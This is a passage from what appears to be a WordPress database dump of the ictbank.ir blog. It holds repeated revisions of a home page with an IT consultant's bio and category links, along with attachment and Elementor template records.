passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:35:07','2023-05-01 15:35:07','',647,'https://ictbank.ir/blog/?p=680',0,'revision','',0),
(681,2,'2023-05-01 15:36:09','2023-05-01 15:36:09','','single_post','','publish','closed','closed','','single_post','','','2023-05-01 15:39:32','2023-05-01 15:39:32','',0,'https://ictbank.ir/blog/?post_type=elementor_library&p=681',0,'elementor_library','',0),
(682,2,'2023-05-01 15:39:32','2023-05-01 15:39:32','','single_post','','inherit','closed','closed','','681-revision-v1','','','2023-05-01 15:39:32','2023-05-01 15:39:32','',681,'https://ictbank.ir/blog/?p=682',0,'revision','',0),
(683,2,'2023-05-01 15:39:32','2023-05-01 15:39:32','','single_post','','inherit','closed','closed','','681-revision-v1','','','2023-05-01 15:39:32','2023-05-01 15:39:32','',681,'https://ictbank.ir/blog/?p=683',0,'revision','',0),
(684,2,'2023-05-01 15:56:36','2023-05-01 15:56:36','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:56:36','2023-05-01 15:56:36','',647,'https://ictbank.ir/blog/?p=684',0,'revision','',0),
(685,2,'2023-05-01 15:56:36','2023-05-01 15:56:36','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:56:36','2023-05-01 15:56:36','',647,'https://ictbank.ir/blog/?p=685',0,'revision','',0),
(686,2,'2023-05-01 15:56:36','2023-05-01 15:56:36','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:56:36','2023-05-01 15:56:36','',647,'https://ictbank.ir/blog/?p=686',0,'revision','',0),
(688,2,'2023-05-01 15:59:59','2023-05-01 15:59:59','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:59:59','2023-05-01 15:59:59','',647,'https://ictbank.ir/blog/?p=688',0,'revision','',0),
(689,2,'2023-05-01 15:59:59','2023-05-01 15:59:59','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:59:59','2023-05-01 15:59:59','',647,'https://ictbank.ir/blog/?p=689',0,'revision','',0),
(690,2,'2023-05-01 15:59:59','2023-05-01 15:59:59','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:59:59','2023-05-01 15:59:59','',647,'https://ictbank.ir/blog/?p=690',0,'revision','',0),
(691,2,'2023-05-01 16:01:39','2023-05-01 16:01:39','haproxy','haproxy','haproxy','inherit','open','closed','','haproxy','','','2023-05-01 16:01:49','2023-05-01 16:01:49','',615,'http://ictbank.ir/blog/wp-content/uploads/2022/12/haproxy.png',0,'attachment','image/png',0),
(693,2,'2023-05-01 16:06:22','2023-05-01 16:06:22','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 16:06:22','2023-05-01 16:06:22','',647,'https://ictbank.ir/blog/?p=693',0,'revision','',0),
(694,2,'2023-05-01 16:06:22','2023-05-01 16:06:22','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 16:06:22','2023-05-01 16:06:22','',647,'https://ictbank.ir/blog/?p=694',0,'revision','',0),
(695,2,'2023-05-01 16:06:22','2023-05-01 16:06:22','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 16:06:22','2023-05-01 16:06:22','',647,'https://ictbank.ir/blog/?p=695',0,'revision','',0),
(696,2,'2023-05-01 16:07:26','2023-05-01 16:07:26','Linux','Linux','Linux','inherit','open','closed','','linux','','','2023-05-01 16:07:38','2023-05-01 16:07:38','',603,'http://ictbank.ir/blog/wp-content/uploads/2022/02/linux.png',0,'attachment','image/png',0),
(697,2,'2023-05-01 16:09:46','2023-05-01 16:09:46','mysql','mysql','mysql','inherit','open','closed','','mysql','','','2023-05-01 16:09:54','2023-05-01 16:09:54','',583,'http://ictbank.ir/blog/wp-content/uploads/2021/06/mysql.jpg',0,'attachment','image/jpeg',0),
(700,2,'2023-05-01 16:16:07','2023-05-01 16:16:07','','posts_all','','publish','closed','closed','','posts_all','','','2023-05-01 16:25:22','2023-05-01 16:25:22','',0,'https://ictbank.ir/blog/?post_type=elementor_library&p=700',0,'elementor_library','',0),
(701,2,'2023-05-01 16:14:30','2023-05-01 16:14:30','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:14:30','2023-05-01 16:14:30','',700,'https://ictbank.ir/blog/?p=701',0,'revision','',0),
(702,2,'2023-05-01 16:14:31','2023-05-01 16:14:31','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:14:31','2023-05-01 16:14:31','',700,'https://ictbank.ir/blog/?p=702',0,'revision','',0),
(703,2,'2023-05-01 16:22:58','2023-05-01 16:22:58','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:22:58','2023-05-01 16:22:58','',700,'https://ictbank.ir/blog/?p=703',0,'revision','',0),
(704,2,'2023-05-01 16:22:58','2023-05-01 16:22:58','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:22:58','2023-05-01 16:22:58','',700,'https://ictbank.ir/blog/?p=704',0,'revision','',0),
(705,2,'2023-05-01 16:22:58','2023-05-01 16:22:58','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:22:58','2023-05-01 16:22:58','',700,'https://ictbank.ir/blog/?p=705',0,'revision','',0),
(706,2,'2023-05-01 16:25:12','2023-05-01 16:25:12','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:25:12','2023-05-01 16:25:12','',700,'https://ictbank.ir/blog/?p=706',0,'revision','',0),
(707,2,'2023-05-01 16:25:12','2023-05-01 16:25:12','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:25:12','2023-05-01 16:25:12','',700,'https://ictbank.ir/blog/?p=707',0,'revision','',0),
(708,2,'2023-05-01 16:25:12','2023-05-01 16:25:12','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:25:12','2023-05-01 16:25:12','',700,'https://ictbank.ir/blog/?p=708',0,'revision','',0),
(709,2,'2023-05-01 16:25:22','2023-05-01 16:25:22','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:25:22','2023-05-01 16:25:22','',700,'https://ictbank.ir/blog/?p=709',0,'revision','',0),
(710,2,'2023-05-01 16:25:22','2023-05-01 16:25:22','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:25:22','2023-05-01 16:25:22','',700,'https://ictbank.ir/blog/?p=710',0,'revision','',0),
(711,2,'2023-05-01 16:25:22','2023-05-01 16:25:22','','posts_all','','inherit','closed','closed','','700-revision-v1','','','2023-05-01 16:25:22','2023-05-01 16:25:22','',700,'https://ictbank.ir/blog/?p=711',0,'revision','',0),
(712,2,'2023-05-01 16:47:57','2023-05-01 16:47:57','','posts_databases_template','','publish','closed','closed','','posts_databases_template','','','2023-05-10 18:15:23','2023-05-10 18:15:23','',0,'https://ictbank.ir/blog/?elementor_library=posts_all_template',0,'elementor_library','',0),
(713,2,'2023-05-01 16:47:57','2023-05-01 16:47:57','','posts_all_template','','inherit','closed','closed','','712-revision-v1','','','2023-05-01 16:47:57','2023-05-01 16:47:57','',712,'https://ictbank.ir/blog/?p=713',0,'revision','',0),
(714,2,'2023-05-01 16:47:57','2023-05-01 16:47:57','','posts_all_template','','inherit','closed','closed','','712-revision-v1','','','2023-05-01 16:47:57','2023-05-01 16:47:57','',712,'https://ictbank.ir/blog/?p=714',0,'revision','',0),
(715,2,'2023-05-01 16:51:09','2023-05-01 16:51:09','','header','','publish','closed','closed','','header','','','2024-04-13 06:37:14','2024-04-13 06:37:14','',0,'https://ictbank.ir/blog/?post_type=elementor_library&p=715',0,'elementor_library','',0),
(716,2,'2023-05-01 17:02:24','2023-05-01 17:02:24','','Default Kit','','inherit','closed','closed','','345-revision-v1','','','2023-05-01 17:02:24','2023-05-01 17:02:24','',345,'https://ictbank.ir/blog/?p=716',0,'revision','',0),
(717,2,'2023-05-01 17:03:20','2023-05-01 17:03:20','','header','','inherit','closed','closed','','715-revision-v1','','','2023-05-01 17:03:20','2023-05-01 17:03:20','',715,'https://ictbank.ir/blog/?p=717',0,'revision','',0),
(718,2,'2023-05-01 17:03:21','2023-05-01 17:03:21','','header','','inherit','closed','closed','','715-revision-v1','','','2023-05-01 17:03:21','2023-05-01 17:03:21','',715,'https://ictbank.ir/blog/?p=718',0,'revision','',0),
(719,2,'2023-05-01 17:03:40','2023-05-01 17:03:40','','header','','inherit','closed','closed','','715-revision-v1','','','2023-05-01 17:03:40','2023-05-01 17:03:40','',715,'https://ictbank.ir/blog/?p=719',0,'revision','',0),
(720,2,'2023-05-01 17:03:52','2023-05-01 17:03:52','','header','','inherit','closed','closed','','715-revision-v1','','','2023-05-01 17:03:52','2023-05-01 17:03:52','',715,'https://ictbank.ir/blog/?p=720',0,'revision','',0),
(721,2,'2023-12-29 13:42:01','2023-05-02 13:02:37','','ICTBANK','','publish','closed','closed','','home','','','2023-12-29 13:42:01','2023-12-29 13:42:01','',0,'https://ictbank.ir/blog/?p=721',1,'nav_menu_item','',0),
